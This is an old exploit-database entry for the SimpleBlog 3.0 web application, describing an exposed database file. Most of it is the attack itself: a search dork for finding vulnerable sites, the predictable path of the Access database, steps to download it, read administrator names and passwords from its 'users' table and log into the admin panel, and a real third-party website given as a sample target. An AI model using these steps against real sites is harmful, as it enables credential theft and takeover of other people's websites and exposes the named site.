SimpleBlog 3.0 - Database Disclosure

Author: EL_MuHaMMeD
type: webapps
platform: php
port: 
date_added: 2008-11-24 
date_updated: 2017-01-03 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url:

[Â»] SimpleBlog 3.0 Mdb Vulnerability
[Â»]
[Â»] ----------------------------------------------------------
[Â»] Author : EL_MuHaMMeD
[Â»]
[Â»] Date : 26.11.2008
[Â»]
[Â»] Contact : cwelmuhammed@gmail.com
[Â»]
[Â»] -----------------------------------------------------------


Script : SimpleBlog 3.0

Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar

Dork : "inurl:simpleblog3"

Our mdb path : db/simpleBlog.mdb

Exploits :

Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb

Step 2 - Download that mdb file and read admin name & pass from "users" table.

Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp

Example :

http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb

http://www.bvrg.org.uk/simpleblog3/admin/default.asp



[Â»] ----------------------------------------------------------------------
[Â»]
[Â»] Cyber-Security.ORG - ELMuHaMMeD.COM
[Â»]
[Â»] ----------------------------------------------------------------------

# milw0rm.com [2008-11-25]